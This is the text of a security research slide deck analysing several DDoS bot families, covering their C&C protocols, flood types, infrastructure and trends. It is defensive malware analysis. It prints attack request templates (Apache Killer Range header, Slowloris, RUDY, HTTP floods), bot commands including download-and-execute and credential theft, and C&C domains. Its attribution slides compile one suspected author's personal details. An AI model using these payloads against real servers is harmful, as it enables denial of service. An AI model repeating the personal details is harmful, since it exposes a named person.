3. 3
Agenda
• Who we are
• How and why
• DDoS Malwares
– PCRat
– DarkDDoser
– Cyclone
– Athena
– SATBot
– Cynic
• Trends and Takeaways
4. 4
Who we are
• Dennis Schwarz
– Security Research Analyst on Arbor Networks’ ASERT
– <3 IDA Pro
– Formerly an intrusion analyst with Dell SecureWorks
• Jason Jones
– Security Research Analyst on Arbor Networks’ ASERT
– Previously of TippingPoint DVLabs
– Research interests
• IP reputation
• Malware clustering
• Data mining
5. 5
ASERT Malware Corral
• Arbor Security Engineering & Response Team
• ASERT Malware Corral
– Malware storage + processing system
– Processing occurs via sandbox, static methods
– Tagging via behavioral and static methods
• Currently pulling in upwards of 100k samples /
day
• 567 Unique family names tagged last year
– Includes DDoS, RATs, Bankers, Infostealers,
Targeted Threats, etc.
6. 6
Why these malwares?
• Since someone took the time to code them, it’s
only fair that we analyze them – quid pro quo
• DDoS related
• Less well known
• Our automated heuristics bubbled these up to
the human analysis pile
• Special to us because we reversed them
8. 8
PCRat – “The APT”
• Made in China
• C++
• Source code uploaded to Google code in March
2011
– http://code.google.com/p/lszpal/
• Source code is based on Gh0st RAT
9. 9
PCRat – Stats
• 117 unique executables
• First seen: September 14, 2012
• Last seen: February 21, 2013
• Connections, 15 unique destinations (resolved March 14, 2013)
– 75384217.3322.org (221.130.179.36 | ASN 24400 | CHINA MOBILE COMMUNICATIONS CORPORATION –
SHANGHAI)
– www.91zhsq.com (118.244.170.139 | ASN 4808 | BEIJING HSOFT TECHNOLOGIES INC)
– sobor.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
– yunddos.3322.org (125.77.199.30 | ASN 4134 | CHINANET FUJIAN PROVINCE NETWORK)
– waitingfor5.gicp.net (65.19.141.203 | ASN 6939 | HURRICANE ELECTRIC INC.)
– rq778899.vicp.net (65.19.157.205 | ASN 6939 | HURRICANE ELECTRIC INC.)
– q2y.3322.org (125.77.199.30 | ASN 4134 | CHINANET FUJIAN PROVINCE NETWORK)
– cygj.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
– vipyg.3322.org (124.232.153.217 | ASN 4134 | CHINANET HUNAN PROVINCE NETWORK)
– 61.147.103.139 (ASN 23650 | CHINANET JIANGSU PROVINCE NETWORK)
– qingkuan.gicp.net (98.126.43.3 | ASN 35908 | KRYPT TECHNOLOGIES)
– Lujian111.3322.org (222.73.163.70 | ASN 4812 | CHINANET SHANGHAI PROVINCE NETWORK)
– sobor.vicp.cc (61.147.121.97 | ASN 23650 | CHINANET JIANGSU PROVINCE NETWORK)
– a944521213.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
– wjydog.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
10. 10
PCRat – Loose Attribution
• lszpal@qq.com uploaded source code
• QQ number 449674599 from source
– Google: Lsz, StarW.lsz, lszhack, Lsztony00, unpack.cn
profile, lszhack.3322.org, support@lszpal.cn
• Unpack.cn forum profile
– http://www.unpack.cn/space-username-lszpal.html
– Birthday: October 10, 1990
– Active: January 8, 2009 – March 13, 2013 (present)
– Baidu profile
12. PCRat – Loose Attribution cont.
• Baidu profile
– http://hi.baidu.com/lszhk
– Male
– 22 years old
– Lives in Shunqing District (administrative center)
of Nanchong in Sichuan province
15. PCRat – Loose Attribution cont.
• 3322.org domains (resolved March 19, 2013)
– lszpal.3322.org (115.238.252.7 | ASN 4134 |
CHINANET-ZJ LISHUI NODE NETWORK)
– lsz.3322.org (59.64.158.18 | ASN 4538 | BEIJING
UNIVERSITY OF POSTS & TELCOMMUCATIONS)
– starw.lsz.3322.org is an alias for lsz.3322.org.
– lszhack.3322.org (221.207.59.118 | ASN 4837 | CHINA
UNICOM QINGHAI PROVINCE NETWORK)
16. Aside: 221.207.59.118 Domains and Malware
16
• Further
research
on
the
IP
is
le9
as
an
exercise
for
the
listener
• Thanks
to
Mike
Barr
of
Arbor
Networks
for
the
Maltego
graph
17. PCRat – Command and Control
00000000 5d 00 00 00 53 00 00 00 50 43 52 61 74 78 9c 93 ]...S... PCRatx..!
00000010 f4 71 f4 73 b7 32 34 30 36 ae 09 cf cc 53 88 08 .q.s.240 6....S..!
00000020 50 08 0e 30 aa 31 32 35 53 f0 75 aa f1 cc 2b 49 P..0.125 S.u...+I!
00000030 cd d1 08 d2 54 88 48 cd cf 03 d1 ce 01 a1 0a 08 ....T.H. ........!
00000040 e0 6a 6a 66 64 a0 a0 e0 a0 60 a4 67 62 e0 ee 51 .jjfd... .`.gb..Q!
00000050 55 63 64 60 68 c4 c0 00 00 8f e3 14 0c Ucd`h... .....!
!
• 93 byte C struct, mostly obfuscated with zlib compression
• Bytes 0-3: total length, in bytes (0x5d)
• Bytes 4-7: length of zlib chunk, in bytes (0x53)
• Bytes 8-12: tag (PCRat)
• Bytes 13-: zlib chunk
!
17
18. PCRat – Command and Control cont.
>>> data = "x5dx00x00x00x53x00x00x00x50x43x52x61x74x78x9c
x93xf4x71xf4x73xb7x32x34x30x36xaex09xcfxcc
x53x88x08x50x08x0ex30xaax31x32x35x53xf0x75xaaxf1xccx2b
x49xcdxd1x08xd2x54x88x48xcdxcfx03xd1xcex01xa1x0ax08xe0x6a
x6ax66x64xa0xa0xe0xa0x60xa4x67x62xe0xee
x51x55x63x64x60x68xc4xc0x00x00x8fxe3x14x0c"!
>>> hex(len(data))!
'0x5d’!
>>> import zlib!
>>> inf = zlib.decompress(data[13:])!
>>> print inf!
LANG:1033|Win XP SP2|256 MB|Intel(R) Xeon(R) CPU E5620 @ 2.40GHz|
2012!
>>> hex(len(inf))!
'0x53'!
18
20. PCRat – DDoS Attack Commands
• ICMP Echo Request Flood
A --------- PING(1024 “I”s) ----------> B
A --------- PING(1024 “I”s) ----------> B
A --------- PING(1024 “I”s) ----------> B
…
• UDP Flood Types 1, 2, and 3
A --------- UDP(4000 “random bytes”) ----------> B
A --------- UDP(36 “hardcoded bytes”) ---------> B
A --------- UDP(1024 “A”s) -------------------------> B
…
20
21. PCRat – DDoS Attack Commands cont.
• TCP SYN Flood
A --------- SYN(spoofed src IP) ----------> B
A --------- SYN(spoofed src IP) ----------> B
A --------- SYN(spoofed src IP) ----------> B
…
• TCP SYN/ACK Flood
A --------- SYN/ACK ----------> B
A --------- SYN/ACK ----------> B
A --------- SYN/ACK ----------> B
…
21
22. PCRat – DDoS Attack Commands cont.
• TCP Connection Flood
A --------- SYN ----------> B
A <----- SYN/ACK ------ B
A --------- ACK ----------> B
close()
…
• TCP Flood Types 1, 2, and 3
A --------- TCP(1024 “random bytes”) ------------------> B
A --------- TCP(1024 “C&C specified bytes”) ---------> B
A --------- TCP(2048 “a”s) ---------------------------------> B
…
22
23. PCRat – DDoS Attack Commands cont.
• HTTP Request Flood Type 1
GET %s HTTP/1.1rn!
Host: %srn!
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:
1.9.0.15) Gecko/2009101601 Firefox/3.0.15Cache-Control: no-
store, must-revalidatern!
Referer: %s%srn!
Connection: keep-alivernrn!
• HTTP Request Flood Type 2
GET %s HTTP/1.1rn!
Host: %srn!
Cache-Control: no-store, must-revalidatern!
Referer: %s%srn!
Connection: Closernrn!
!
23
24. PCRat – DDoS Attack Commands cont.
• HTTP Request Flood Type 3
GET / HTTP/1.1rn!
Host: %srn!
Cache-Control: no-cachern!
Connection: Closernrn!
• HTTP Request Flood Type 4
GET %s HTTP/1.1rn!
Content-Type: text/htmlrn!
Host: %srn!
Accept: text/html, */*rn!
User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0;
MyIE 3.01)rnrn!
!
24
26. DarkDDoser
• Programmed in Delphi
• Written by HaLLaFaMeR x2
• Costs $30
• Boasts 5 Floods
– SYN flood
– UDP flood
– HTTP GET flood
– “SlowLoris”
– “ARME”
• Claims to be rewriting in C++
28. 28
Search Warrant Email Account
hallafamerx2@gmail.com, et al
Case Number: 2:2011mc50698
Filed: June 7, 2011
Court: Michigan Eastern District Court
Office: Detroit Office
County: Wayne
Presiding Judge: George Caram Steeh
Nature of Suit: Other Statutes - Other Statutory
Actions
Jurisdiction: Federal Question
Jury Demanded By: None
29. DarkDDoser CnC
• Many CnCs using dynamic DNS
• Simple pipe-delimited protocol on random ports
– ADDNEW|Stable|5.6c|US|Windows XP x86|Idle...|3175|NEW!
– ARME|192.168.56.1|www.google.com|30|5!
– ARME|<IP Address>|<Host header>|<Num forks>
<Num threads>!
– SLOW|192.168.56.1|192.168.56.1|<Sockets>|<Num Forks>|
<Method>!
– HTTP|192.168.56.1|www.google.com|1|3000|POST!
– UDP|192.168.56.1|80|65|6000|6000|55|6!
– STATUS|Idle…!
32. DarkDDoser Basic Floods
• UDP
– Standard flood, packet size specified by CnC
– Random port
• SYN
– Not spoofed, random ports
• HTTP
GET <target URI> HTTP/1.1!
Host: 10.1.10.68!
User-Agent: <random user-agent from list>!
Accept: */*;q=0.1!
Accept-Encoding: gzip,deflate!
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8!
Referer: <random referer from list>!
Content-Type: application/x-www-form-urlencoded!
Connection: Keep-Alive!
33. DarkDDoser Slowloris
GET / HTTP/1.1!
Host: <website>!
User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us)
AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/
531.21.102011-10-16 20:23:10!
Accept: */*;q=0.1!
Accept-Encoding: gzip,deflate!
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8!
Referer: www.meta.ua!
Content-Type: application/x-www-form-urlencoded!
Connection: Keep-Alive!
34. 34
Apache ARME Vulnerability
• Apache allocates range requests into buckets
• Each range allocates more memory
• Large number of overlapping range requests
causes large amt of memory allocation
• Example:
• Range: bytes=5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,
5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,
5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,
5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-110,
5-111,5-112,5-113,5-114,5-115,5-116,5-117,5-118,5-119,5-120,5-121,5-122,5-123,5-124,
5-125,5-126,5-127,5-128,5-129,5-130,5-131,5-132,5-133,5-134,5-135,5-136,5-137,5-138,
5-139,5-140,5-141,5-142,5-143,5-144,5-145,5-146,5-147,5-148,5-149,5-150,5-151,5-152,
5-153,5-154,5-155,5-156,5-157,5-158,5-159,5-160,5-161,5-162,5-163,5-164,5-165,5-166,
5-167,5-168,5-169,5-170,5-171,5-172,5-173,5-174,5-175,5-176,5-177,5-178,5-179,5-180, 5-181,5-182,5-183
35. DarkDDoser ARME
HEAD / HTTP/1.1!
Host: <target>!
User-Agent: Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/
534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+2011-10-16
20:21:10!
Range: bytes=0-63!
Accept-Encoding: gzip!
Connection: close!
!
HEAD / HTTP/1.1!
Host: <target>!
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)!
Range: bytes=0-36!
Accept-Encoding: gzip!
Connection: close!
!
45. Cyclone – Command and Control
• IRC based (yep, still being used)
• C&C details are obfuscated using the same
method as MP-Ddoser/IP Killer
• Jeff Edwards of Arbor Networks has written a
decoder
45
47. Cyclone – Identified Command
• .login <password> - log in to bot
• .logout - log out of bot
• .rc - reconnect to IRC server
• .status - show DoS attack status
• .info - show system information
• .uninstall - remove self
• .kill - kill and remove self
• .stop - stop DoS attacks
• .dl <URL> - download and execute
• .botkiller - kill off other bots on the host
• .ftp - pillage Filezilla credentials
• DDoS attacks (described next)
47
48. Cyclone – DDoS Attack Commands
• .udp
A --------- UDP(2000 “digits and lowercase letters”) ----------> B
A --------- UDP(2000 “digits and lowercase letters”) ----------> B
A --------- UDP(2000 “digits and lowercase letters”) ----------> B
…
• .arme
– ARME (Apache Remote Memory Exhaustion) a.k.a. Apache Killer
attack by Kingcope
HEAD / HTTP/1.1!
!Host: 10.1.6.71!
!Range:bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,…a lot more…
5-1298,5-1299!
!Accept-Encoding: gzip!
!Connection: close!
48
49. Cyclone – DDoS Attack Commands cont.
• .layer7
– Randomly chooses out of 44 possible User-Agents
HEAD / HTTP/1.1!
Host: 10.1.6.71!
User-Agent: Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.3) Gecko/
20060426 Firefox/1.5.0.3!
Connection: keep-alive!
• .slowloris
– Randomly chooses a Content-Length value between 100000000 and
510065408
– Not a proper Slowloris attack (not slow!)
POST / HTTP/1.1!
Host: 68.42.70.60!
Connection: keep-alive!
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/
534.56.5 (KHTML, like Gecko) Version/5.1.6 Safari/534.56.5!
Content-Length: 429844219!
49
50. Cyclone – DDoS Attack Commands cont.
• .httpget
– Referer is comprised of 10 random lowercase letters followed by a
randomly selected generic TLD (10 possibilities)
GET / HTTP/1.0!
Host: 68.42.70.60!
Keep-Alive: 300!
Connection: keep-alive!
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)!
Referer: z6j4ncowgj.info!
• .httpdownload
GET / HTTP/1.0!
Host: 68.42.70.60!
Keep-Alive: 300!
Connection: keep-alive!
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101
Firefox/12.0!
Referer: ypoq1xlx2s.rs!
50
51. Cyclone – DDoS Attack Commands cont.
• .httpstrong
– R-U-Dead-Yet (RUDY) attack
– POST data is an endless stream of lowercase letters and digits
POST / HTTP/1.0!
Host: 10.1.6.71!
Keep-Alive: 300!
Connection: keep-alive!
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3)
Gecko/20090824 Firefox/3.5.3!
Content-Type: application/x-www-form-urlencoded!
Content-Length: 1000000!
Referer: 7k8qhka5ym.net!
!
eiq48mw17v3mb7...!
51
54. Athena
• Started as IRC bot, recently evolved to HTTP
• Consistent updating
• Author contact info:
– Jabber: AthenaIRC@thesecure.biz
– MSN: AthenaIRC@hotmail.com
– ICQ: 618099251
55. 55
Athena Pricing
• 100$ - Solitary bin of Athena built to customer-specified
configuration
10$ - Rebuild / Update of bin
15$ - I will set up your IRC myself so it is most-suitable for
Athena on a server of yours through TeamViewer, join.me,
PuTTY, etc.
• 130$ - Ready channel spot capable of holding 20k bots and
a bin of Athena -Prices are not permenant and can be
subject to change at any point in time
-After purchase, it is up to the buyer to contact either me. I
will not chase you down.
-PayPal and Liberty Reserve are accepted.
56. 56
Athena Versions / Builders
• Cracked builders for 1.8.3 and 1.8.7 available
– Version set to Athena=shit!
– Contains string “IPKiller>Athena”
– Versions from 2.1 -> 2.2 -> 2.3 observed in our
corral
• Version 2 has more features
• Removes standalone btcwallet command
• Adds filesearch to accomplish that + more
57. Athena Features
• Bitcoin wallet stealing
• File search + upload
• Password stealing
• Visit website
• Download and execute file
• IRC War
• Execute commands
• “Encrypted” IP
• Encrypted commands
66. SATBOT – Stats
• 12 unique executables
• First seen: September 11, 2012
• Last seen: February 11, 2013
• Connections, 1 unique destination (resolved
March 14, 2013)
– 216.86.156.135
(ip135.216-86-156.static.steadfastdns.net | ASN
32748 | STEADFAST NETWORKS)
66
67. SATBOT – Maybe Attribution
• IP is hosting a Website – “Stock Gumshoe:
Secret Teaser Stocks Revealed”
– “Feels” shady, but could be a hacked site
67
68. SATBOT – Identified Commands
• auth – login
• stopddos - stop SYN flood
• info - get system information
• listproc - get process listing
• dir - get directory listing
• prd - setup port redirection
• srd - stop port redirection
• dwn - download and execute
• seeya - remove self
• websrv - start a password protected directory listing web server
• stopweb - stop web server
• terminate - terminate a process
• logout - log out
• spam - spread self via IM
• raw - echo back message
• rnb - change nickname
• syn – launch SYN flood
– Proper SYN flood
68
70. Aside: SYN Flood “Commands”
• A lot of them tend to be implemented as TCP connection floods
– Easier to use a connect()
A --------- SYN ----------> B
A <----- SYN/ACK ------ B
A --------- ACK ----------> B
close()
…
vs
A --------- SYN ----------> B
A --------- SYN ----------> B
A --------- SYN ----------> B
…
70
72. Cynic
• Bot coded in C
• Author(s) unknown
• Intially posts a request to /cynic/gate.php
• Appears to be IRC CnC after that*
• Only a handful of samples observed in our
corral
72
73. Cynic String Encoding
• Strings are stored encrypted
• Hard-coded plain-text key
• String byte XOR’d against all key bytes, then
logical NOT’d
• Main decryption routine calls decrypt routine
with key for all strs
• Strings contained
– Registry keys
– Imports
– Phone home information
73
74. Cynic CnC
!
POST /cynic/gate.php HTTP/1.1!
Content-Type: application/x-www-form-urlencoded!
Cache-Control: no-cache!
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)!
Host: ix.kasprsky.org!
Content-Length: 53!
Connection: Close!
!
;.......g..........L9:..R....hb.].e....(...(.{T....jb!
74
80. Trends and Takeaways
• Packaging of DDoS attacks in malware
– Either one TCP connection flooder tacked onto a RAT/
traditional bot
– Or a package of 20-something flooders for a DDoS-specific
bot
• Copy and paste culture
– Hard to classify families
• Coders not paying attention
– Lots of typos and missing pieces
– Broken implementations of attacks
• Too many flood types
– Can be tedious to reverse out the details
80
82. Trends and Takeaways cont.
• Hash table DoS attacks haven’t really been weaponized at the botnet
level yet
– Jeff Edwards of Arbor Networks has talked about similar delays
from proof-of-concept to weaponization when Slowloris, ARME, etc.
were released
• Obfuscation tends to be XOR, base64, rot13, or zlib based
– Sometimes RC4 – but the plaintext key is readily available
– Everyone will reverse RC4 at least once…
– And gzip…
• C&C via IRC is still common
• Delphi code usually means Russians
• Reversing Visual Basic bots
– Oh god, my eyes!
– Rage quits
82
85. Trends and Takeaways cont.
• Future research will start focusing more on attribution
– Mandiant APT1 release
• PHP DDoS botnets are hot at the moment
– Triple Crown Attacks on US banks
– Effective, but the scripts themselves and the backend infrastructure
seem relatively immature
• DNS Amplification attacks are also hot
– Spamhaus DDoS attacks in late March 2013
• One of the largest seen so far
• Spawned open resolver project
• Attention to “DDoS as a Service” providers will rise
– Krebs on Security DDoS/SWATing attack in March 2013
– Game booters
85